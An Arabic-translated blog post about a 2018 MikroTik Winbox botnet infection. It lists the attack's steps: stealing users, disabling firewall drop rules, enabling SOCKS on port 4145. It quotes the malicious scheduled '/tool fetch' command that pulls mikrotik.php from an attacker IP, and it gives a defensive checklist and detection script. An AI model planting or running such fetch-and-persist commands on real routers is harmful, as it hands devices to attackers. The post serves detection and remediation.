ضعف Mikrotik الجديد؟ لا ، ولكن الأمر يستحق التحقق من أجهزتك.



في 2 أغسطس ، تلقيت MikroTik: نشرة إخبارية أمنية عاجلة تشير إلى أن الروبوتات كانت تستخدم ضعف خدمة Winbox لاختراق الأجهزة وإصابتها.

من نص الرسالة الإخبارية ، أصبح من الواضح أنه تم إغلاق الثغرة الأمنية في 23 أبريل 2018 في الإصدار v6.42.1. لقد بدأت في التحقق من الأجهزة المدعومة ووجدت العديد من أجهزة التوجيه مع 6.40.1 ، أحدها مصاب.

ماذا يفعل النص المهاجم؟

  • الحصول على قائمة بالمستخدمين من خلال ثغرة أمنية (أي أن تغيير المشرف إلى شيء آخر لا يحفظ).
  • يحاول تسجيل الدخول باستخدام جميع عمليات تسجيل الدخول المستلمة ويزيل تلك التي تم حظرها.
  • بعد العثور على تسجيل الدخول النشط ، الحصول على كلمة المرور الخاصة به ، تسجيل الدخول إلى النظام.

ثم:

  • تعطيل كافة قواعد الإفلات على جدار الحماية.
  • تمكن الجوارب (IP - Socks) على منفذ غير قياسي ، في حالتي 4145.
  • يضيف /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no البرنامج النصي /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no في النظام - البرامج النصية
  • يضيف تشغيل برنامج نصي إلى System - Scheduler.
  • يحذف النصوص الموجودة (التي أبلغ عنها منتدى Mikrotik).

جاء الهجوم من العنوان 95.154.216.151 ، الذي ينتمي لشركة iomart Hosting Limited ، كتب لهم رسالة من خلال الموقع ، ولكن لا يوجد رد فعل حتى الآن ، العنوان نشط.

العنوان 95.154.216.166 نشط أيضًا ، ولكن لا يوجد ملف mikrotik.php عليه.

هنا يمكنك رؤية رسائل الضحايا:
www.abuseipdb.com/check/95.154.216.151
www.abuseipdb.com/check/95.154.216.166

إذا لم يتم تحديث Mikrotik الخاص بك حتى الآن وكان منفذ Winbox مفتوحًا للجميع ، فتأكد من التحقق من الجهاز.

  1. نتحقق من أن قواعد الإفلات في IP - جدار الحماية نشطة.
  2. نتحقق من الجوارب ، يجب فصلها ويجب أن يكون المنفذ افتراضيًا - 1080.
  3. تحقق من البرامج النصية اليسرى في النظام - البرامج النصية والنظام - المجدول.
  4. التحقق من وجود ملف miktorik.php
  5. نحن نقوم بالتصدير في المحطة الطرفية والتحقق من التكوين بأعيننا.

اقترح مستخدم gotsprings في منتدى Mikrotik هذا الخيار:

 :if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"} :if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"} :if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."} :if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."} :if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."} 

افتح تسجيلك وإلقاء نظرة على النتائج. إذا كان لديك نتيجة مع "!" قد تكون لديك مشكلة.

من الواضح أنه من السيء جدًا إبقاء خدمة Winbox مفتوحة للجميع ، ولكن في بعض الحالات يحدث هذا ، لا تنس تحديث أجهزتك!

روابط ذات صلة:

forum.mikrotik.com/viewtopic.php؟f=21&t=137572
thehackernews.com/2018/08/mikrotik-router-hacking.html

Source: https://habr.com/ru/post/ar419205/


All Articles